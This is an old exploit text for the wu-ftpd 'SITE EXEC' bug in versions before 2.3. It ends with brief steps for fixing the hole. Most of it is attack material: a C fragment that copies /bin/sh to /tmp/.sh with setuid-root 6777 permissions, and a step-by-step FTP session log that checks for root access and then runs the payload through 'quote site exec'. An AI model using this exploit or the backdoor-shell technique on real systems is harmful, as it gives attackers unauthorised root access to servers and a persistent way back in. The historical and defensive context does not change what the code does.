Sites running wuarchive ftpd versions prior to 2.3 or running
"wrl" ftpd version ??
wu-ftpd before version 2.3 has a bug in the "SITE EXEC" command
which allows people to run commands in the ftp server. If the
directory /bin/ftp-exec exits *inside* the anonymous ftp chroot
area, the attack is fairly weak - you can get a shell owned
inside the ftp area. This is still a pretty nasty attack since
there is a change you could use it to upload trojans to the ftp
server. However if you have a /bin/ftp-exec directory in your
real outside filesystem, a hacker can trivially get a root shell
on your machine by telneting to the ftp port and issuing a SITE
EXEC ../../../../bin/sh command! - you issue this command as the
first thing you do after telneting to the port, before any
attempt to log in. Thus you still have the root privileges
of the ftp deamon itself. Nasty.
Compile program :
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
seteuid (0);
system ("cp /bin/sh /tmp/.sh");
system ("chmod 6777 /tmp/.sh");
Login to the sistem :
220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) ready.
Name (exploitablesys:root): goodaccount
331 Password required for goodaccount.
Password: (password)
230 User goodaccount logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
See if system is exploitable :
ftp> quote "site exec bash -c id"
200-bash -c id
200-uid=0(root) gid=0(root) euid=505(statik) egid=100(users) groups=100(users)
200 (end of 'bash -c id')
Exploit system :
ftp> quote "site exec bash -c /yer/home/dir/ftpbug"
200-bash -c /yer/home/dir/ftpbug
200 (end of 'bash -c /yer/home/dir/ftpbug')
ftp> quit
221 Goodbye.
As an emergency measure remove the ftp-exec directory immediately,
hack the source and remove the 'site exec' feature, add 'chmod no
anonymous' and 'umask no anonymous' to your ftpaccess file to
stop outsiders from uploading executables, then as soon as you
possible can, fetch the latest version of wuarchive's ftpd.
Upgrade to the lastest version.